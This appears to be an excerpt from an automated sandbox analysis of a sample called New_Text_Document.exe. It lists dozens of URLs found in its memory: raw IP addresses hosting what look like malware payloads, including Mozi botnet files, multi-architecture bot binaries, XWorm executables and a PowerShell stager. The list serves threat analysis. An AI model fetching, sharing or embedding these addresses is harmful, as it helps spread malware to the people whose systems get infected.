                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.57.165.123:28278/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.6.60.220:49091/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.13.24.38:64613/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.25.190.150:54874/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.25.231.139:19049/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.29.176.98:41588/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.87.220.93:42788/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.129.21.133:19312/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.165.130.43:22624/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.180.49.110:65445/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.203.222.113:65490/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.219.185.171:46701/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.230.17.135:51142/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.32.168.51:16133/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.227.162.114:39714/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.235.51.144:44126/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.238.235.195:38111/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.239.154.145:57803/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.243.98.71:55981/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.132.191.126/DS.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.139.13.79:8186/%E4%BF%A1%E5%A4%A9%E6%B8%B8.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.139.138.38/MipsLinuxTF
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.139.212.236/asdsada.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.139.212.236/zj.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.241.17.49:3031/second.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.249.172.195:888/112
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.249.172.195:888/112s
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.203.122.41/Archevod_XWorm.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.203.122.41/ClickMe.lnk
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.203.122.41/Magic_Stage.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.118.35.245:1218/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.174/snype.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.127.102.193/images/3Qh6z9z6SSc1NH/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.129.14.83/ca.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.129.14.83/ch.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.129.14.83/fra.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.152.84.69/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.132.163:32762/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.53.218.26:23605/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.28/meokl/KK2023.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.39.10/bins/scorp.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.87.5.2:11503/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.115/x8.n
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.129/bins/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/i5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/i6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/mips
